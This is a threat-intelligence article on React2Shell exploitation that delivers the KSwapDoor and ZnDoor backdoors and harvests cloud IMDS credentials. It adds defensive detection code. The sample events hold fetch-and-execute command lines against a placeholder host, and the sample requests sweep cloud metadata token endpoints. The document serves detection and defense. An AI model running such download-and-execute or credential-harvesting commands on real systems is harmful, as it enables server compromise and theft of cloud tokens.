Key Takeaways:
- The React2Shell vulnerability is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor.
- KSwapDoor is a professionally engineered remote access tool that builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks.
- The vulnerability has been exploited by multiple threat actors, including at least five China-nexus groups, to deliver an array of payloads.
- The attacks are characterized by the use of Cloudflare Tunnel endpoints to evade security defenses and by reconnaissance of the compromised environments to facilitate lateral movement and credential theft.
- The credential harvesting activity targets the cloud Instance Metadata Service (IMDS) endpoints of Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud.
Introduction to React2Shell
The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. The flaw is a maximum-severity remote code execution bug, so a successful exploit gives the attacker command execution on the affected server and a foothold from which to reach the data and systems behind it. KSwapDoor, in particular, is a professionally engineered remote access tool designed with stealth in mind, allowing compromised servers to communicate with each other and evade security blocks.
KSwapDoor Malware
KSwapDoor is a sophisticated Linux backdoor that builds an internal mesh network, enabling compromised servers to talk to each other and evade security blocks. It encrypts its command-and-control communications and features a "sleeper" mode: the implant stays dormant until the attacker sends a covert wake-up signal, which lets it operate behind firewalls that block unsolicited inbound connections. It also disguises itself as the Linux kernel swap daemon (the kernel thread kswapd0) to evade detection, making it harder for security teams to spot the implant in a process listing. The backdoor offers an interactive shell, command execution, file operations, and lateral movement scanning, giving attackers full control over the compromised systems.
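A process can call itself kswapd0, but it cannot become a kernel thread: every genuine kernel thread is a child of kthreadd (PID 2) and has no executable file behind /proc/<pid>/exe, while a user-space implant has a real parent and a real binary. The following added example (written for this page, not code from Unit 42 or from the malware) checks the process table for that mismatch. It reads the live /proc when run on Linux and otherwise falls back to a constructed sample table; the sample PIDs, names, and the /tmp/.x path are invented placeholders.

```python
import os
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass
class Proc:
    """One process as read from /proc/<pid>/{comm,stat,exe}."""
    pid: int
    ppid: int
    comm: str             # /proc/<pid>/comm; any process can set this via prctl(PR_SET_NAME)
    exe: Optional[str]    # readlink(/proc/<pid>/exe); None when there is no backing file


KTHREADD_PID = 2  # kthreadd: the parent of every genuine kernel thread

# Kernel-thread names worth checking; kswapd* is the one KSwapDoor is reported to imitate.
KERNEL_THREAD_NAME = re.compile(r"^(kswapd\d*|kworker/.+|ksoftirqd/\d+|migration/\d+|kcompactd\d*)$")


def is_impostor(p: Proc) -> bool:
    """True when a process carries a kernel-thread name but is not a kernel thread.

    A user-space process cannot be reparented under kthreadd, so a parent other
    than PID 2 is decisive on its own; a resolvable exe link is a second signal.
    """
    if not KERNEL_THREAD_NAME.match(p.comm):
        return False
    return p.ppid != KTHREADD_PID or p.exe is not None


def find_impostors(procs: Iterable[Proc]) -> List[Proc]:
    return [p for p in procs if is_impostor(p)]


def read_proc_table() -> List[Proc]:
    """Read the live process table from /proc (Linux only; run as root so exe links resolve)."""
    procs: List[Proc] = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            with open(f"/proc/{pid}/stat") as fh:
                stat = fh.read()
            # stat is "pid (comm) state ppid ..."; split after the last ')' because comm may contain spaces
            ppid = int(stat.rsplit(")", 1)[1].split()[1])
        except (OSError, ValueError, IndexError):
            continue  # process exited mid-read
        try:
            exe: Optional[str] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = None  # kernel threads (and processes we are not allowed to inspect) have no readable exe link
        procs.append(Proc(pid, ppid, comm, exe))
    return procs


# Constructed sample table, not captured data: a genuine kswapd0 under kthreadd, and an
# impostor named kswapd0 that was started by init and runs from a hidden directory.
SAMPLE_TABLE = [
    Proc(pid=2, ppid=0, comm="kthreadd", exe=None),
    Proc(pid=88, ppid=2, comm="kswapd0", exe=None),
    Proc(pid=1500, ppid=1, comm="node", exe="/usr/bin/node"),
    Proc(pid=4213, ppid=1, comm="kswapd0", exe="/tmp/.x/kswapd0"),
]


if __name__ == "__main__":
    table = read_proc_table() if os.path.isdir("/proc") else SAMPLE_TABLE
    for p in find_impostors(table):
        print(f"suspicious: pid={p.pid} ppid={p.ppid} comm={p.comm} exe={p.exe}")
```

The parent-PID test is the one to rely on: an unprivileged run cannot read other users' exe links, so exe comes back None, but a fake kswapd0 still shows a user-space parent. Names are cheap to forge; lineage is not.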
Exploitation of React2Shell
In a related development, NTT Security said organizations in Japan are being targeted by cyber attacks exploiting React2Shell to deploy ZnDoor, a malware assessed to have been active in the wild since December 2023. The attack chains run a bash command that fetches the payload from a remote server using wget and executes it. ZnDoor is a remote access trojan that contacts the same threat actor-controlled infrastructure to receive commands and execute them on the host. Its supported commands include shell, interactive_shell, explorer, explorer_cat, explorer_delete, explorer_upload, explorer_download, system, change_timefile, socket_quick_startstreams, start_in_port_forward, and stop_in_port; judging by the names, they cover shell access, file management, file timestamp manipulation, and port forwarding.
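The fetch-and-execute step is the most detectable part of that chain: a Node.js server process has no business spawning a shell that downloads a binary and runs it. The added example below (written for this page, not NTT Security's or the project's own code) scores process-creation events on two independent signals, a shell spawned by a JavaScript runtime and a wget/curl invocation followed by execution of what it fetched, and rates an event that trips both as high. The JSON events are constructed to resemble what an EDR or auditd-based collector emits; the host 198.51.100.7, the paths, and the PIDs are placeholders.

```python
import json
import re
from typing import Dict, List, Optional

# Parent processes that should never need a shell to download and run binaries on a web server.
JS_RUNTIMES = {"node", "nodejs", "next-server", "bun", "deno"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}

# A wget/curl invocation and the URL it fetches (the lazy middle part stops at the next separator).
DOWNLOADER = re.compile(r"\b(wget|curl)\b[^;&|]*?(https?://\S+)")
# Something executed after the fetch: chmod +x, a path invoked after ; & or |, or a pipe into a shell.
EXEC_AFTER = re.compile(r"chmod\s+\+?x\s+\S+|[;&|]\s*\.?/\S+|\|\s*(sh|bash|dash)\b")


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def assess(event: Dict) -> Dict:
    """Score one process-creation event; returns the reasons found and a severity."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    reasons: List[str] = []
    if parent in JS_RUNTIMES and child in SHELLS:
        reasons.append(f"shell spawned by JS runtime {parent}")
    fetch = DOWNLOADER.search(cmdline)
    if fetch and EXEC_AFTER.search(cmdline):
        reasons.append(f"fetch-and-execute from {fetch.group(2)}")
    severity: Optional[str] = "high" if len(reasons) == 2 else ("medium" if reasons else None)
    return {"pid": event.get("pid"), "severity": severity, "reasons": reasons}


def scan(jsonl: str) -> List[Dict]:
    """Run assess() over newline-delimited JSON events, returning only those that scored."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        result = assess(json.loads(line))
        if result["severity"]:
            hits.append(result)
    return hits


# Constructed events, not real telemetry. One true positive, one benign build step spawned by
# node, one benign health check from cron, and a fetch-and-execute with a non-JS parent.
SAMPLE_EVENTS = """
{"pid": 4201, "parent_image": "/usr/bin/node", "image": "/bin/sh", "cmdline": "sh -c wget -q http://198.51.100.7/x.sh -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x"}
{"pid": 4202, "parent_image": "/usr/bin/node", "image": "/bin/sh", "cmdline": "sh -c npm run build"}
{"pid": 4203, "parent_image": "/usr/sbin/cron", "image": "/bin/sh", "cmdline": "sh -c curl -s https://example.com/health"}
{"pid": 4204, "parent_image": "/bin/bash", "image": "/bin/bash", "cmdline": "bash -c curl -fsSL http://198.51.100.7/i | sh"}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The medium hits are deliberate: a shell under node during a build, or a curl-pipe-sh from an interactive session, each deserve a look but not a page. Tune JS_RUNTIMES to the process names actually used in your deployment (a containerised Next.js app may run as next-server), and pair the rule with egress logging so the fetched URL can be blocked and pivoted on.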
CVE-2025-55182 Vulnerability
The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, including at least five China-nexus groups, to deliver an array of payloads. Google, which identified these groups, said they have weaponized the vulnerability to deliver tunneling utilities, downloaders, backdoors, and remote access trojans. Microsoft, in its own advisory for CVE-2025-55182, said threat actors have used the flaw to run arbitrary post-exploitation commands, including setting up reverse shells to known Cobalt Strike servers and then dropping remote monitoring and management (RMM) tools.
Attack Characteristics
The attacks are characterized by the use of Cloudflare Tunnel endpoints to evade security defenses and by reconnaissance of the compromised environments to facilitate lateral movement and credential theft. The credential harvesting activity targets the cloud Instance Metadata Service (IMDS) endpoints of Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud, with the end goal of acquiring identity tokens that let the attackers burrow deeper into the cloud environment. Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts, to extract a range of secrets, including AI service and cloud-native credentials.
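Each provider's IMDS vends credentials from a well-known path (AWS and Azure even share the 169.254.169.254 address, so only the path tells them apart), and each except Tencent demands a protocol header that a casual request would not carry. The added example below (written for this page, not Unit 42's tooling) classifies outbound HTTP requests by provider and credential endpoint and alerts when anything other than the expected cloud agents asks for a token, which is exactly what a web application process does after React2Shell exploitation. The request records are constructed in the shape an HTTP-aware egress proxy or eBPF tracer would log; the PIDs, the external host 203.0.113.9, and the EXPECTED_CALLERS allowlist are assumptions to be tuned per fleet.

```python
import json
import re
from typing import Dict, List

IMDS_HOSTS = {"169.254.169.254", "metadata.google.internal", "metadata.tencentyun.com"}

# Credential-vending paths per provider, checked in order; the path decides where hosts overlap.
CREDENTIAL_ENDPOINTS = [
    ("aws", re.compile(r"^/latest/(api/token|meta-data/iam/security-credentials)")),
    ("azure", re.compile(r"^/metadata/identity/oauth2/token")),
    ("gcp", re.compile(r"^/computeMetadata/v1/.*service-accounts/[^/]+/token")),
    ("tencent", re.compile(r"^/latest/meta-data/cam/security-credentials")),
]

# Headers each provider's IMDS protocol uses; presence shows the caller knows the provider it is on.
PROTOCOL_HEADERS = {
    "aws": {"x-aws-ec2-metadata-token", "x-aws-ec2-metadata-token-ttl-seconds"},  # IMDSv2 only
    "azure": {"metadata"},
    "gcp": {"metadata-flavor"},
    "tencent": set(),
}

# Processes that legitimately talk to IMDS on a typical instance (assumption: adjust to your fleet).
EXPECTED_CALLERS = {"cloud-init", "amazon-ssm-agent", "waagent", "google_guest_agent", "tat_agent"}

URL = re.compile(r"^https?://([^/:]+)(?::\d+)?(/.*)?$")


def classify(record: Dict) -> Dict:
    """Tag one outbound request: IMDS or not, which provider's credential endpoint, and whether to alert."""
    m = URL.match(record.get("url", ""))
    host, path = (m.group(1), m.group(2) or "/") if m else ("", "")
    out = {
        "pid": record.get("pid"), "comm": record.get("comm", ""), "url": record.get("url", ""),
        "imds": host in IMDS_HOSTS, "provider": None, "credential_endpoint": False,
        "protocol_header": False, "alert": False,
    }
    if not out["imds"]:
        return out
    for provider, pattern in CREDENTIAL_ENDPOINTS:
        if pattern.match(path):
            out["provider"] = provider
            out["credential_endpoint"] = True
            break
    headers = {k.lower() for k in record.get("headers", {})}
    out["protocol_header"] = bool(headers & PROTOCOL_HEADERS.get(out["provider"], set()))
    # Metadata reads such as instance-id are routine; credential retrieval by anything other
    # than the cloud agents is the post-exploitation pattern described in the reporting.
    out["alert"] = out["credential_endpoint"] and out["comm"] not in EXPECTED_CALLERS
    return out


def scan(jsonl: str) -> List[Dict]:
    """Return the alerting records from newline-delimited JSON request logs."""
    return [r for r in (classify(json.loads(l)) for l in jsonl.splitlines() if l.strip()) if r["alert"]]


# Constructed request log, not captured data: a compromised node process sweeping all four
# providers' token endpoints, followed by routine agent traffic and an ordinary API call.
SAMPLE_REQUESTS = """
{"pid": 1500, "comm": "node", "method": "PUT", "url": "http://169.254.169.254/latest/api/token", "headers": {"X-aws-ec2-metadata-token-ttl-seconds": "21600"}}
{"pid": 1500, "comm": "node", "method": "GET", "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "headers": {"X-aws-ec2-metadata-token": "<token>"}}
{"pid": 1500, "comm": "node", "method": "GET", "url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/", "headers": {"Metadata": "true"}}
{"pid": 1500, "comm": "node", "method": "GET", "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", "headers": {"Metadata-Flavor": "Google"}}
{"pid": 1500, "comm": "node", "method": "GET", "url": "http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/", "headers": {}}
{"pid": 612, "comm": "cloud-init", "method": "GET", "url": "http://169.254.169.254/latest/meta-data/instance-id", "headers": {}}
{"pid": 700, "comm": "amazon-ssm-agent", "method": "GET", "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "headers": {"X-aws-ec2-metadata-token": "<token>"}}
{"pid": 1500, "comm": "node", "method": "GET", "url": "http://203.0.113.9/api/v1/items", "headers": {}}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"ALERT pid={hit['pid']} comm={hit['comm']} provider={hit['provider']} url={hit['url']}")
```

Detection is the fallback; the controls that remove the payoff are requiring IMDSv2 on AWS with the response hop limit set to 1, and on every provider attaching only the narrowly scoped role, managed identity, or service account the application actually needs, so that a harvested token cannot be used to burrow further.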
Operation PCPcat
In another campaign detailed by Beelzebub, threat actors have been observed exploiting flaws in Next.js, including CVE-2025-29927 (the middleware authorization bypass) and CVE-2025-66478 (the Next.js identifier for the React2Shell bug), to enable systematic extraction of credentials and sensitive data. The malware establishes persistence on the host to survive reboots, installs a SOCKS5 proxy, opens a reverse shell, and installs a scanner that probes the internet for further vulnerable React applications to propagate to. The activity, codenamed Operation PCPcat, is estimated to have already breached 59,128 servers, showing the characteristics of a large-scale intelligence operation and industrial-scale data exfiltration.
Vulnerability Tracking
The Shadowserver Foundation is currently tracking over 111,000 IP addresses vulnerable to React2Shell attacks, with over 77,800 of them in the U.S., followed by Germany, France, and India. Data from GreyNoise shows 547 malicious IP addresses, located in the U.S., India, the U.K., Singapore, and the Netherlands, participating in exploitation attempts over the past 24 hours. Given how widely the flaw is exposed and how actively it is being probed, organizations should patch immediately and review exposed instances for signs of compromise.